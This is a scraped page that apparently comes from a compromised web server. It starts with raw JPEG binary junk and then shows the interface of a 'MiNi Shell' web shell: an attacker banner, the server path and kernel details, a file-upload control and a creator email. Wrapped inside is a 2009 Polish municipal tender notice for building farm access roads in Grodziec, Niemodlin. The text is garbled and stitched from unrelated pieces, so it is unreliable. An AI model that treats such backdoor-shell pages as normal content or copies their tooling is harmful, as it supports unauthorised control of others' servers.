JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/127910-N-2009.html

<p class="kh_header"><b>Niemodlin: Budowa dróg dojazdowych do gruntów rolnych w Grodźcu</b><br>
<b>Numer ogłoszenia: 127910 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Niemodlin , ul. Bohaterów Powstań Śląskich 37, 49-100 Niemodlin, woj. opolskie, tel. 077 4606295, faks 077 4606260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niemodlin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa dróg dojazdowych do gruntów rolnych w Grodźcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest budowa drogi dojazdowej do gruntów rolnych w miejscowości Grodziec, gmina Niemodlin o łącznej długości 760 m i szerokości 3,5 m, dwóch włączeń do drogi powiatowej 
o łącznej długości 8m oraz wzmocnionych poboczy o szerokości 2 x 0,50 m.
2. Zakres robót obejmuje:
- wzmocnienie istniejącego podłoża gruntowego poprzez stabilizację polimerowo-katalityczną 
z doziarnieniem gruntu rodzimego materiałem spoistym grub. 25 cm,
- wyrównanie i zagęszczenie do uzyskania właściwej niwelety,
- wykonanie dywanika z betonu asfaltowego o grub. 4 cm - warstwa ścieralna,
- wykonanie poboczy wzmocnionych poprzez stabilizację polimerowo-katalityczną oraz warstwą kamienia łamanego 0-31,5 mm grub. 4cm i szer. 2 x 0,50 m,
- wykonanie włączenia A i C do drogi powiatowej zgodnie z planem zagospodarowania,
- regulacja pionowa studzienek dla zaworów wodociągowych i gazowych,
- ustawienie pionowych znaków drogowych,
- wykonanie przepustów rurowych pod zjazdami - rury betonowe o średnicy 50 cm,
- oczyszczanie rowów z wyprofilowaniem dna i skarp z namułu grub. 20 cm /docelowo 40 cm/..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystepujący do postępowania jest obowiązany wnieść wadium 
w wysokości 10.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> V. OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

1.	Złożą ofertę podpisaną przez osobę uprawnioną do reprezentowania Wykonawcy.
2. Prowadzą działalność gospodarczą w zakresie budowy dróg.
3.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi 
do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do 
udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia t.j.:
	3.1. dysponują kierownikiem budowy posiadającym uprawnienia w specjalności drogowej z min. 3 - letnim doświadczeniem zawodowym związanym z kierowaniem budową dróg,
	3.2. udokumentują wykonanie w ciągu ostatnich 5 lat, co najmniej 2 robót w zakresie budowy dróg 
o wartości odpowiadającej conajmniej wartości robót stanowiących przedmiot zamówienia, w tym 
1 robotę, w której wykonywana była polimerowo-katalityczna stabilizacja gruntu oraz przedstawią referencje od zamawiającego, potwierdzające ich należyte wykonanie.
4.	Znajdują się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia, t.j.:
4.1. posiadają zdolność kredytową w wysokości min. 100.000 zł lub posiadają własne środki finansowe na koncie bankowym w wysokości min. 100.000 zł.
4.2. nie zalegają w opłacaniu podatków, opłat oraz składek na ubezpieczenie społeczne 
5. Posiadają polisę ubezpieczeniową potwierdzającą, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej; minimalna kwota ubezpieczenia - 200.000 zł 
6. Złożą kosztorys ofertowy. Kosztorys ofertowy należy wykonać w dwóch częściach:
- część kwalifikowalna, obejmująca przedmiar robót kwalifikowalnych współfinansowanych ze środków
   terenowego Funduszu Ochrony Gruntów Rolnych,
- część niekwalifikowalna, obejmująca przedmiar robót niekwalifikowalnych (włączenia do drogi 
   powiatowej).
7. Wniosą wadium.
8. Nie podlegają wykluczeniu z postępowania - złożą stosowne oświadczenie na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.

W celu stwierdzenia spełnienia warunków udziału w niniejszym postępowaniu Zamawiający dokona oceny 
i sprawdzenia kompletności oraz poprawności dokumentów wyszczególnionych w p-cie VI na zasadzie (spełnia/nie spełnia). W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI. 	WYKAZ DOKUMENTÓW POTWIERDZAJĄCYCH SPEŁNIANIE WARUNKÓW UDZIAŁU 
W POSTĘPOWANIU
1. W celu potwierdzenia posiadania uprawnień do wykonywania określonej działalności lub czynności oraz nie podlegania wykluczeniu z postępowania Wykonawca zobowiązany jest złożyć (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich):
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
2) oświadczenie, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub, że uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się 
o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).

2. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania niezbędnej wiedzy 
i doświadczenia, a także dysponowania przez Wykonawcę potencjałem technicznym i osobami zdolnymi do
wykonania zamówienia, Wykonawca zobowiązany jest złożyć:
1) wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania sporządzony wg wzoru stanowiącego załącznik nr 3 do SIWZ 
(w tym 1 robotę, w której wykonywana była polimerowo-katalityczna stabilizacja gruntu) oraz załączeniem dokumentów wystawionych przez zamawiających, potwierdzających, że roboty te zostały wykonane należycie (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie),
2) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć 
w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wg wzoru stanowiącego załącznik nr 5 do SIWZ,
3) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,  jeżeli w wykazie, o którym mowa w ppkt 2) wykonawca wskazał osoby, którymi będzie dysponował,
4) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia i kwalifikacje, w tym kserokopia uprawnień kierownika budowy przewidzianego do wykonania zamówienia, oraz zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego.

3. W celu potwierdzenia znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca zobowiązany jest złożyć:
1) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
2) polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200.000 zł.

4. Ponadto oferta powinna zawierać następujące dokumenty:
1) pełnomocnictwo do reprezentowania wykonawców składających ofertę wspólną w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy,
2) oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu 
z postępowania w myśl art. 22 i 24 ustawy Pzp. zgodnie z załączonym wzorem - załącznik nr 2 do niniejszej SIWZ,
3) wypełniony i podpisany druk oferty przez osobę ) osoby uprawnione do zaciągania zobowiązań w imieniu Wykonawcy - załącznik nr 1 do niniejszej SIWZ,
4) dane dotyczące powierzonych części zamówienia podwykonawcom - załącznik nr 4 do niniejszej SIWZ,
5) kosztorys ofertowy,
6) dowód wniesienia wadium.

Uwaga: Dokumenty, o których mowa powyżej, mogą być przedłożone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez jedną z osób uprawnionych do reprezentowania Wykonawcy 
z dopiskiem (za zgodność z oryginałem). 
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.

5. Oświadczenie, o którym mowa w pkt VI.4.2) należy złożyć w formie oryginału. W przypadku Wykonawców składających ofertę wspólną, oświadczenie zgodne z art. 22 ust. 1 pkt 1-3 zobowiązany jest złożyć Pełnomocnik ustanowiony do reprezentowania Wykonawców, natomiast każdy z Wykonawców występujących wspólnie składa oświadczenie na mocy art. 22 ust. 1 pkt 4 ustawy Pzp.

6. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, powinien złożyć dokumenty zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U. z 2006r. Nr 87 poz. 605 z późn. zm.), jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej 
w pkt. VI.1.1);2), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji, ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu.

Stosownie do treści § 2 ust. 2 powołanego powyżej rozporządzenia, dokumenty, o których mowa powyżej 
w pkt VI.6.a) i b) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Natomiast dokument, o którym mowa powyżej w pkt VI.6.c, powinien być wystawiony nie wcześniej niż 
3 miesiące przed upływem terminu składania ofert.
Stosownie do treści § 2 ust. 3 cytowanego wyżej rozporządzenia, jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

W celu stwierdzenia spełnienia warunków udziału w niniejszym postępowaniu zamawiający dokona oceny 
i sprawdzenia kompletności oraz poprawności dokumentów złożonych na podstawie p. VI Specyfikacji  Istotnych Warunków Zamówienia oraz terminu i kwoty wniesionego wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.niemodlin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Niemodlinie, ul. Bohaterów Powstań Śląskich 37; 49-100 NIEMODLIN
Wydział Inwestycji i Funduszy Europejskich (p. 38, II piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 10:00, miejsce: Urząd Miejski w Niemodlinie, ul. Bohaterów Powstań Śląskich 37; 49-100 NIEMODLIN
sekretariat - pokój 26 (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com